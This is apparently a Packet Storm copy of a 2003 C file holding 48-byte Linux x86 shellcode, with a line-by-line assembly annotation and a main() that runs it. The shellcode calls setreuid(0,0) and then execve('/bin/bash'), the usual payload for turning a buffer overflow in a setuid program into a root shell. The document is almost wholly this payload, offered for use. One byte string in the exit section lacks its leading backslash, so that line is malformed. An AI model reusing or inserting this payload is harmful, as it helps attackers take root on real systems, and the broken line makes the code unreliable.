Linux x86 shellcode (48 bytes) which does setreuid(0,0); execve("/bin/bash", NULL); exit(0);
9b5c6592a60521c7b883d20faff2a3b2f672c2706732bafb65e60fe26cd543f8/*
* (c) ROSIELLO SECURITY 2003
* &
* DTORS SECURITY 2003
*
* Linux x86 shellcode 48 bytes
* setreuid(0,0);
* execve("/bin/bash", NULL);
* exit(0);
*--------------------------------------------------------------------------
* AUTHOR : Angelo Rosiello
* CONTACT: angelo@rosiello.org, angelo@dtors.net, rosiello.angelo@virgilio.it
* URL : http://www.rosiello.org
*
*/
#include <unistd.h>
char shellcode[] =
//setreuid(0, 0);
"\x31\xc0" // xor %eax, %eax
"\xb0\x70" // movb $0x70, %al
"\x31\xdb" // xor %ebx, %ebx
"\x31\xc9" // xor %ecx, %ecx
"\xcd\x80" // int $0x80
//execve("/bin/bash", NULL)
"\x31\xc0" // xor %eax,%eax
"\x50" // push %eax
"\x6a\x68" // pushl $0x68
"\x68\x2f\x62\x61\x73" // push $0x7361622f
"\x68\x2f\x62\x69\x6e" // push $0x6e69622f
"\x89\xe3" // mov %esp,%ebx
"\x8d\x54\x24\x0c" // lea 0xc(%esp, 1), %edx
"\x50" // push %eax
"\x53" // push %ebx
"\x8d\x0c\x24" // lea (%esp,1),%ecx
"\xb0\x0b" // mov $0xb,%al
"\xcd\x80" // int $0x80
//exit(0);
"x31\xc0" // xor %eax, %eax
"\xb0\x01" // movb $0x1, %al
"\xcd\x80"; // int $0x80
main()
{
void (*routine) ();
(long) routine = &shellcode;
routine();
}
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed